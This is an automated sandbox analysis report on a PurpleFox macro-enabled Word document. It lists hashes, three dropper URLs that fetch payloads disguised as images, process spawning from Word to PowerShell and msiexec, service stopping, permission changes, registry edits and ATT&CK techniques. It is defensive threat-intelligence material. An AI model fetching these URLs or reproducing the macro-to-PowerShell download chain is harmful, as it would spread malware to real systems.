purplefox | 38f581881093c044667d565a698aa389f14585a58d5c8b692dc2be851293f1c2

Resubmissions

21/09/2023, 07:25

230921-h86p5sgc32 10

20/09/2023, 23:55

230920-3yrhpabc6y 10

Analysis

max time kernel
101s
max time network
103s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
21/09/2023, 07:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ID-191304203986.docm
Size

44KB
MD5

8c498f9e6dd65c5a9704208922224661
SHA1

1dc2f872c2e23e1eb0c6090909c5807553ad1e75
SHA256

38f581881093c044667d565a698aa389f14585a58d5c8b692dc2be851293f1c2
SHA512

b6a5eceef6739421ed2f0f6a479df496ecb1894b7694651b24a50689d663b1d7f1b1bf58c2edacf6a2fa59908a58f25cd00e389765871cb1856acb3431bcca50
SSDEEP

768:T6D/hwDg0kIo+rQGtBMIYta9l87miNPZjinjUeipoRkqk:T6D/u801rQIBMNg86AB+njUpoqqk

Score

10^/10

purplefox discovery evasion rootkit trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/zKJFnbnzeum8/37d4fddb6bf2de6611c6655a5cd37972fc33642d/ace.jpg

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/T2qomNwfFUeS/62f331959dde379b2536caed26a74ae8460c0c30/all.png

Extracted

Language

ps1

Source

URLs

exe.dropper

http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/5hwtrLyyHFiv/7b0985c861986ec9e2087ade8273e544009d68e1/SsdxxIp8DqeQ.jpg

Signatures

Detect PurpleFox MSI 1 IoCs

Detect PurpleFox MSI.

rootkit

resource	yara_rule
behavioral1/files/0x0009000000016d68-69.dat	purplefox_msi

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	2644	2016	PowerShell.exe	27

PurpleFox
PurpleFox is an exploit kit used to distribute other malware families and first seen in 2018.
rootkit trojan purplefox

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2612	powershell.exe
4	2812	powershell.exe
5	1624	msiexec.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Loads dropped DLL 4 IoCs

pid	Process
572	MsiExec.exe
572	MsiExec.exe
572	MsiExec.exe
572	MsiExec.exe

Modifies file permissions 1 TTPs 6 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2220	takeown.exe
788	takeown.exe
1684	takeown.exe
1376	takeown.exe
1848	takeown.exe
2440	takeown.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI898C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI94E5.tmp	msiexec.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE
File opened for modification	C:\Windows\Installer\MSI8779.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8AF5.tmp	msiexec.exe
File created	C:\Windows\Installer\f768bae.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\.xml	msiexec.exe
File created	C:\Windows\dbcode86mk.log	msiexec.exe
File opened for modification	C:\Windows\Installer\f768bae.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8279.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8A48.tmp	msiexec.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2716	sc.exe
2864	sc.exe

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE

Modifies data under HKEY_USERS 44 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b0fcedef5cecd901	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D	msiexec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	msiexec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E	msiexec.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E	msiexec.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2016	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2644	PowerShell.exe
